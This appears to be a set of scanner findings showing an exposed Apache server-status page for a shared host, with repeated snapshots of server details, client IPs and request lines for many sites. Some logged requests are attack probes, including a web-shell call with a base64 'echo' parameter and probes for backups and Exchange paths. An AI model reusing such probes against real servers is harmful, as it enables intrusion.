      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqConnChildSlotClientVHostRequest
      
      0-1112167680/14/2919836W
      0.02000.00.16151473.36
      213.180.203.115bravalingua.com:8080GET /robots.txt HTTP/1.0
      
      1-1112118690/57/2884950W
      0.131500.02.54150627.64
      185.240.102.28over-shop.ru:8080GET /index.php?route=extension/module/syncms/StockUpdate&cron= 
      
      2-111269270/160/2847925W
      0.332900.027.21148967.66
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      3-1112118700/162/2812504W
      0.36000.08.60146543.59
      5.255.231.8vidook.ru:8080GET /%D0%A0%D0%B0%D0%B7%D0%B3%D0%BE%D0%B2%D0%BE%D1%80%D0%BD%D0%
      
      4-1112148090/40/2785267W
      0.061600.01.51146239.25
      185.240.102.28over-shop.ru:8080GET /index.php?route=extension/module/syncms/OrderAdd&cron= HTT
      
      5-1112169240/2/2723773W
      0.00200.00.05143161.53
      82.147.85.79pulse-prirody.ru:8080GET /contacts/ HTTP/1.0
      
      6-1112140680/51/2702867W
      0.083500.02.12140111.63
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      7-1112135290/120/2639989W
      0.24000.04.53137360.22
      194.58.113.37foto-dekor.ru:8080GET / HTTP/1.0
      
      8-1112128430/54/2591106W
      0.111200.02.12135022.16
      78.107.252.54slashfocus.ru:8080POST /gw/ HTTP/1.0
      
      9-1112119220/127/2564397W
      0.31000.010.94136488.34
      185.246.64.222cyber-battle.ru:8080GET / HTTP/1.0
      
      10-1112119251/95/2528098C
      0.25016221.65.12132422.33
      87.250.224.208vidook.ru:8080GET /%D0%A1%D1%80%D0%B5%D0%B4%D1%81%D1%82%D0%B2%D0%B0+%D0%B4%D0
      
      11-1112154260/48/2460670W
      0.10000.01.82129149.20
      185.240.102.28pulse-prirody.ru:8080POST /wp-cron.php?doing_wp_cron=1694644218.01533699035644531250
      
      12-1112153180/31/2402321W
      0.06300.01.27127658.66
      103.176.23.168grandkeramika.by:8080GET /index.php?route=http%3a%2f%2fwww.google.com&product_id=586
      
      13-111272560/120/2335701W
      0.22000.04.13120470.80
      213.180.203.63vidook.ru:8080GET /%D0%A1%D0%BA%D0%BE%D0%BB%D1%8C%D0%BA%D0%BE+%D1%81%D1%82%D0
      
      14-1112169390/1/2272300W
      0.00100.00.00118595.00
      34.102.111.90ehto.ru:8080GET /.well-known/apple-app-site-association HTTP/1.0
      
      15-1112169400/1/2212448W
      0.00100.00.00116094.84
      34.102.111.90ehto.ru:8080GET /.well-known/assetlinks.json HTTP/1.0
      
      16-1112169560/0/2128219W
      0.84000.00.00112728.66
      34.102.111.90ehto.ru:8080GET /.well-known/gpc.json HTTP/1.0
      
      17-111297700/205/2063854W
      0.382600.013.63110057.27
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      18-111273020/270/1949142W
      0.54000.013.72103053.28
      95.108.213.170bestcube.space:8080GET /chto-oznachaet-press-f-v-memah HTTP/1.0
      
      19-1112130390/43/1865344W
      0.091300.01.38100151.27
      185.240.102.28ldk-sokol.ru:8080POST /?mailpoet_router&endpoint=cron_daemon&action=run&data=eyJ
      
      20-1112169570/0/1745182W
      0.06000.00.0092337.70
      34.102.111.90ehto.ru:8080GET /.well-known/security.txt HTTP/1.0
      
      21-1112145110/79/1674779W
      0.21000.03.8187619.64
      46.8.16.243scooter-ani.ru:8080POST /signup/ HTTP/1.0
      
      22-1112145130/87/1574312W
      0.16000.04.1483529.09
      146.70.45.182jenny.linkpc.net:8080GET /? HTTP/1.0
      
      23-1112149060/9/1476090W
      0.01400.00.1578703.27
      195.138.109.198kalitkatomsk.ru:8080GET /drugie-tovary/furnitura/354-pratico-a-09-10-zoloto-mat-zol
      
      24-1112169590/0/1387316W
      0.03000.00.0072239.48
      34.102.111.90ehto.ru:8080GET /.well-known/change-password HTTP/1.0
      
      25-1112149560/62/1300542W
      0.14000.03.2369236.59
      164.90.205.35trustdefend.org:8080GET /server-status HTTP/1.0
      
      26-1112169610/0/1214713W
      0.19000.00.0066482.87
      34.102.111.90ehto.ru:8080GET /.well-known/resource-that-should-not-exist-whose-status-co
      
      27-1112149990/62/1133361W
      0.16000.03.5260080.07
      172.234.18.59prt4.ru:8080GET //wp-admin/css/colors/blue/blue.php?wall=ZWNobyBhRHJpdjQ7ZX
      
      28-1112150000/46/1067371W
      0.08000.02.3156653.47
      84.17.58.6burandesign.ru:8080GET /dbase.php HTTP/1.0
      
      29-1112-0/0/1028240.
      0.002900.00.0054844.83
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      30-1112-0/0/958771.
      0.0934300.00.0049964.87
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      
      Found on 2023-09-13 22:30
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e6a8eb42e6a8eb42685f30b6

      Apache Status
      
      Apache Server Status for www.trustdefend.org (via 127.0.0.1)
      
      Server Version: Apache/2.4.6 (CloudLinux) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
      Server MPM: prefork
      Server Built: Jun  9 2023 19:20:27
      
      Current Time: Wednesday, 13-Sep-2023 03:59:35 MSK
      Restart Time: Friday, 18-Aug-2023 12:09:53 MSK
      Parent Server Config. Generation: 1091
      Parent Server MPM Generation: 1090
      Server uptime:  25 days 15 hours 49 minutes 42 seconds
      Server load: 7.68 8.61 9.49
      Total accesses: 79388186 - Total Traffic: 4041.8 GB
      CPU Usage: u59.78 s15.02 cu0 cs0 - .00337% CPU load
      35.8 requests/sec - 1.9 MB/second - 53.4 kB/request
      11 requests currently being processed, 3 idle workers
      _WWWW...WW....._W.WW_..W..W.....................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqConnChildSlotClientVHostRequest
      
      0-1090285220/161/2817177_
      0.250180.07.09145138.13
      146.70.170.3shinrolling.ru:8080POST /admin/index.php HTTP/1.0
      
      1-1090324420/25/2781814W
      0.03000.00.99144688.00
      185.168.184.50ds-hikvision.ru:8080POST /metrika/sendInfo/ HTTP/1.0
      
      2-1090325220/18/2749023W
      0.03000.01.13143014.64
      87.250.224.54mebozon.ru:8080GET /divany/pryamye-divany/divan-rembo-plyush-karamel HTTP/1.0
      
      3-1090315150/56/2710444W
      0.10000.02.96140845.48
      167.99.8.63trustdefend.org:8080GET /server-status HTTP/1.0
      
      4-1090309480/61/2690842W
      0.121500.01.59140867.78
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      5-1090-0/0/2630473.
      0.27100.00.00137865.94
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      6-1090-0/0/2609486.
      0.012600.00.00134788.09
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      7-1090-0/0/2548522.
      0.11000.00.00132190.81
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      8-1090295780/150/2504616W
      0.231600.06.98129711.52
      185.240.102.28ldk-sokol.ru:8080POST /?mailpoet_router&endpoint=cron_daemon&action=run&data=eyJ
      
      9-1090319590/56/2476929W
      0.09000.03.53131353.63
      87.250.224.75mebozon.ru:8080GET /ecomeb/divan-dilan-dizajn-2 HTTP/1.0
      
      10-1090-0/0/2442346.
      0.414100.00.00127417.65
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      11-1090-0/0/2379439.
      0.008700.00.00124444.46
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      12-1090-0/0/2320624.
      0.434400.00.00122746.95
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      13-1090-0/0/2258781.
      0.192800.00.00115886.91
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      14-1090-0/0/2196469.
      0.0218700.00.00114050.25
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      15-1090106300/280/2134990_
      0.44000.09.87111286.78
      187.114.52.81hard.line.pm:8080GET /ps/NF67zq.js HTTP/1.0
      
      16-1090218240/344/2058820W
      0.62000.013.95108689.38
      79.141.68.10zimag.ru:8080GET / HTTP/1.0
      
      17-1090-0/0/1996003.
      0.649300.00.00106113.49
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      18-1090254300/288/1888685W
      0.43000.013.7999518.38
      5.255.231.4mebozon.ru:8080GET /divan-uglovoj-monako-fox-evroknigka HTTP/1.0
      
      19-1090218260/252/1806050W
      0.50000.011.0096699.88
      5.255.231.152uslygi-santexnika-tomsk.ru:8080GET / HTTP/1.0
      
      20-1090218290/410/1691634_
      0.660550.018.2188927.66
      87.250.224.6babylon96.ru:8080GET /index.php?route=product/product&product_id=5290 HTTP/1.0
      
      21-1090-0/0/1623118.
      0.2315300.00.0084512.20
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      22-1090-0/0/1521469.
      0.0613700.00.0080280.69
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      23-1090254340/356/1427101W
      0.59000.025.5375985.66
      213.87.151.193persant.ru:8080GET /aksessuary/?page=90 HTTP/1.0
      
      24-1090-0/0/1343658.
      0.0517500.00.0069884.66
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      25-1090-0/0/1259808.
      0.0019200.00.0066799.96
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      26-1090254780/155/1177476W
      0.272000.08.2864329.70
      45.150.9.245zimag.ru:8080GET /dekorativnoe-osveshchenie/svetodiodnye-zanavesy/svetodiodn
      
      27-1090-0/0/1098350.
      0.0119000.00.0058020.41
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      28-1090-0/0/1035551.
      0.0118500.00.0054846.41
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      29-1090-0/0/999930.
      0.0218200.00.0053325.06
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      30-1090-0/0/932883.
      0.0318900.00.0048608.37
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      31-1090-0/0/874281.
      0.432000.00.0046028.11
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      32-1090-0/0/811345.
      0.0716900.00.0043105.06
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      33-1090-0/0/719613.
      0.0236500.00.0037967.89
      127.0.0.1185.240.102.32:8080
      Found on 2023-09-13 00:59
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e6a8eb42e6a8eb420eb1477b

      Apache Status
      
      Apache Server Status for www.trustdefend.org (via 127.0.0.1)
      
      Server Version: Apache/2.4.6 (CloudLinux) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
      Server MPM: prefork
      Server Built: Jun  9 2023 19:20:27
      
      Current Time: Sunday, 10-Sep-2023 19:34:19 MSK
      Restart Time: Friday, 18-Aug-2023 12:09:53 MSK
      Parent Server Config. Generation: 998
      Parent Server MPM Generation: 997
      Server uptime:  23 days 7 hours 24 minutes 26 seconds
      Server load: 12.99 12.41 11.59
      Total accesses: 72060692 - Total Traffic: 3656.4 GB
      CPU Usage: u35.01 s9.81 cu0 cs0 - .00223% CPU load
      35.8 requests/sec - 1.9 MB/second - 53.2 kB/request
      12 requests currently being processed, 17 idle workers
      WWWW______WWWW.W____.__.WCW.__..___.............................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqConnChildSlotClientVHostRequest
      
      0-9976390/31/2543984W
      0.044300.00.74130596.16
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      1-997325370/18/2520144W
      0.036600.00.40130701.98
      23.105.238.220naviglon.ru:8080GET /vamshop-1c.php?wc1c=exchange?type=catalog&mode=import&file
      
      2-997314130/182/2485131W
      0.30000.06.40128799.92
      95.108.213.82gems.sale:8080GET /grey HTTP/1.0
      
      3-997277200/118/2450155W
      0.2112100.04.56127049.12
      23.105.238.220naviglon.ru:8080GET /vamshop-1c.php?wc1c=exchange?type=catalog&mode=import&file
      
      4-997317600/123/2434769_
      0.230380.04.96126912.20
      188.130.211.75asdmcpe.org:8080GET /user/NovikBlife/ HTTP/1.0
      
      5-99719530/26/2374476_
      0.040120.00.82123522.55
      185.156.1.164ds-hikvision.ru:8080POST /metrika/sendInfo/ HTTP/1.0
      
      6-99721550/42/2363730_
      0.090190.02.02121635.39
      46.158.251.143cartin.ru:8080GET /sadovaja-tehnika HTTP/1.0
      
      7-99725730/15/2301995_
      0.02000.01.57118909.82
      24.101.237.155hard.line.pm:8080GET /ps/uw1Oju.js HTTP/1.0
      
      8-99711600/58/2264726_
      0.12010.02.96116933.27
      5.255.231.42gems.sale:8080GET /robots.txt HTTP/1.0
      
      9-99726050/15/2237020_
      0.0302690.01.14118395.72
      213.180.203.163scooter-ani.ru:8080GET /product/zvezda-veduschaya-139fmb-moped-420-16t/politika-ko
      
      10-99713620/42/2211079W
      0.081100.01.60114800.79
      66.249.76.233zimag.ru:8080GET /hvoinye-konusa-piramidy-svetodiodnye-d-103122-21m HTTP/1.0
      
      11-99721580/35/2153346W
      0.07000.010.46112083.65
      77.83.84.79migrantcentrspb.ru:8080GET /razreshenie-na-vremennoe-prozhivanie/?utm_source=yandex&ut
      
      12-9977700/69/2100470W
      0.111100.03.58110422.47
      23.105.238.220naviglon.ru:8080GET /vamshop-1c.php?wc1c=exchange?type=catalog&mode=import&file
      
      13-99713890/29/2039861W
      0.05000.01.47103531.57
      167.99.184.41trustdefend.org:8080GET /server-status HTTP/1.0
      
      14-997-0/0/1989060.
      0.00300.00.00102717.75
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      15-997299210/171/1927667W
      0.283500.06.1099865.27
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      16-99714260/46/1864685_
      0.090550.01.6897837.13
      92.99.82.76next.run.place:8080GET / HTTP/1.0
      
      17-99714270/11/1804880_
      0.0101680.00.4095124.91
      87.250.224.203mebozon.ru:8080GET /rosmebel/divan-modulnyj-monreal-1-marsal?page=18 HTTP/1.0
      
      18-9978370/53/1711050_
      0.0901450.04.4189634.63
      94.26.228.97elektriksan.ru:8080GET /santehnika/kanalizacija/chto-delat-kogda-v-tualete-pahnet-
      
      19-99714300/41/1634545_
      0.06000.01.6387175.09
      167.99.184.41trustdefend.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      20-997-0/0/1527324.
      0.02100.00.0079699.51
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      21-99726520/9/1467863_
      0.010130.00.5976464.84
      91.122.198.178dahua-dh.ru:8080POST /metrika/sendInfo/ HTTP/1.0
      
      22-99714310/63/1377708_
      0.110120.02.5772744.71
      185.68.145.102ds-hikvision.ru:8080POST /metrika/sendInfo/ HTTP/1.0
      
      23-997-0/0/1291533.
      0.00500.00.0068807.19
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      24-99726540/6/1222461W
      0.00600.00.2163285.85
      185.240.102.28ldk-sokol.ru:8080POST /?mailpoet_router&endpoint=cron_daemon&action=run&data=eyJ
      
      25-99727021/7/1144577C
      0.01000.30.5160761.20
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      26-99727030/9/1067101W
      0.01000.00.9958343.00
      80.78.240.111intelspro.ru:8080POST /gw/ HTTP/1.0
      
      27-997-0/0/1001715.
      0.00400.00.0052719.04
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      28-997203520/504/942657_
      0.970120.040.8149780.26
      95.79.95.219ds-hikvision.ru:8080POST /metrika/sendInfo/ HTTP/1.0
      
      29-99727060/15/912770_
      0.010570.00.2648279.00
      167.94.252.141jenny.linkpc.net:8080GET / HTTP/1.0
      
      30-997-0/0/852880.
      0.01000.00.0044451.45
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      31-997-0/0/796654.
      0.00200.00.0041969.17
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      32-99727090/12/739547_
      0.01<
      Found on 2023-09-10 16:34
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e6a8eb42e6a8eb42b03619a7

      Apache Status
      
      Apache Server Status for www.trustdefend.org (via 127.0.0.1)
      
      Server Version: Apache/2.4.6 (CloudLinux) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
      Server MPM: prefork
      Server Built: Jun  9 2023 19:20:27
      
      Current Time: Thursday, 07-Sep-2023 04:15:10 MSK
      Restart Time: Friday, 18-Aug-2023 12:09:53 MSK
      Parent Server Config. Generation: 858
      Parent Server MPM Generation: 857
      Server uptime:  19 days 16 hours 5 minutes 17 seconds
      Server load: 11.29 10.66 10.01
      Total accesses: 60099208 - Total Traffic: 3083.7 GB
      CPU Usage: u26.07 s5.99 cu0 cs0 - .00189% CPU load
      35.4 requests/sec - 1.9 MB/second - 53.8 kB/request
      9 requests currently being processed, 10 idle workers
      W.____._WWW__W.__W_.W..W..W.....................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqConnChildSlotClientVHostRequest
      
      0-857310550/51/2066744W
      0.09000.01.74107808.19
      45.81.39.170o-gto.ru:8080GET /wp-admin/css/colors/blue/-wp-admin-css-colors-blue--wp-adm
      
      1-857-0/0/2048701.
      0.08000.00.00107824.34
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      2-857293990/89/2020710_
      0.1401890.02.65105858.07
      95.108.213.95mebozon.ru:8080GET /divany/pryamye-divany/divan-otello-venge-ambr HTTP/1.0
      
      3-857326950/20/1989047_
      0.02000.00.43105028.76
      93.115.7.238jenny.linkpc.net:8080GET /favicon.ico HTTP/1.0
      
      4-857294000/61/1983280_
      0.0903790.010.59104626.53
      167.99.63.166chuvanova.com:8080GET /ads.txt HTTP/1.0
      
      5-857317310/30/1927522_
      0.04016010.018.42101329.63
      148.251.96.130grandkeramika.by:8080GET /index.php?route=product/product&manufacturer_id=28&product
      
      6-857-0/0/1917386.
      0.12100.00.00100044.94
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      7-857310900/54/1871537_
      0.11000.01.9498214.87
      46.101.103.192trustdefend.org:8080GET /v2/_catalog HTTP/1.0
      
      8-857267790/166/1839486W
      0.272600.09.2296658.73
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      9-857154840/402/1825690W
      0.74000.015.3597818.70
      46.101.103.192trustdefend.org:8080GET /server-status HTTP/1.0
      
      10-857185770/336/1802182W
      0.631000.020.1594684.59
      78.107.252.54slashfocus.ru:8080POST /gw/ HTTP/1.0
      
      11-857273920/126/1755984_
      0.1901470.05.1593098.04
      185.139.215.221jeans123.ru:8080GET /wrangler-W5F25K14V/ HTTP/1.0
      
      12-857273930/109/1707092_
      0.19000.03.7090853.57
      46.101.103.192trustdefend.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      13-857233460/262/1664484W
      0.473900.015.3485390.09
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      14-857-0/0/1612666.
      0.271200.00.0084064.08
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      15-857250980/223/1568216_
      0.3801430.011.8682999.73
      45.81.39.170o-gto.ru:8080GET /wp-admin/css/colors/blue/-wp-admin-css-colors-blue--wp-adm
      
      16-857299970/77/1520330_
      0.130150.013.4081171.24
      91.122.198.178dahua-dh.ru:8080POST /metrika/sendInfo/ HTTP/1.0
      
      17-857301250/34/1479349W
      0.112000.02.0078709.04
      66.249.76.129zimag.ru:8080GET /svetodiodnye-girlyandy-nit/girlyanda-nit-10-m-24v-100-tepl
      
      18-857234050/373/1399625_
      0.6501460.027.2574012.24
      45.81.39.170o-gto.ru:8080GET /wp-admin/css/colors/blue/-wp-admin-css-colors-blue--wp-adm
      
      19-857-0/0/1334305.
      0.02300.00.0072305.68
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      20-857317730/43/1255657W
      0.07000.01.1966534.68
      176.99.229.143arenda-jlg.ru:8080GET /backup.zip HTTP/1.0
      
      21-857-0/0/1207021.
      0.02900.00.0063021.55
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      22-857-0/0/1143079.
      0.019700.00.0061102.43
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      23-857275840/93/1068029W
      0.141300.04.7057413.68
      185.240.102.28ldk-sokol.ru:8080POST /?mailpoet_router&endpoint=cron_daemon&action=run&data=eyJ
      
      24-857-0/0/1018704.
      1.126400.00.0053690.47
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      25-857-0/0/956927.
      0.3618400.00.0051745.55
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      26-857161330/447/900678W
      0.773900.027.9949433.30
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      27-857-0/0/845609.
      0.5126700.00.0045311.34
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      28-857-0/0/795554.
      0.0331500.00.0042398.03
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      29-857-0/0/772322.
      0.0431200.00.0040946.91
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      30-857-0/0/721492.
      0.0131900.00.0037743.04
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      31-857-0/0/681845.
      0.4116800.00.0035683.10
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      32-857-0/0/633285.
      0.0131800.00.0033712.75
      127.0.0.1185.240.102.32:8080OPTIONS * HTT
      Found on 2023-09-07 01:15
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e6a8eb42e6a8eb42740bbce3

      Apache Status
      
      Apache Server Status for www.trustdefend.org (via 127.0.0.1)
      
      Server Version: Apache/2.4.6 (CloudLinux) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
      Server MPM: prefork
      Server Built: Jun  9 2023 19:20:27
      
      Current Time: Sunday, 03-Sep-2023 19:05:39 MSK
      Restart Time: Friday, 18-Aug-2023 12:09:53 MSK
      Parent Server Config. Generation: 759
      Parent Server MPM Generation: 758
      Server uptime:  16 days 6 hours 55 minutes 45 seconds
      Server load: 8.41 8.70 8.10
      Total accesses: 50135159 - Total Traffic: 2521.4 GB
      CPU Usage: u50.75 s15.09 cu0 cs0 - .00468% CPU load
      35.6 requests/sec - 1.8 MB/second - 52.7 kB/request
      20 requests currently being processed, 31 idle workers
      WW_W___W__W_W_____W_WWWWCW____W__W____W____WW____WW.............
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
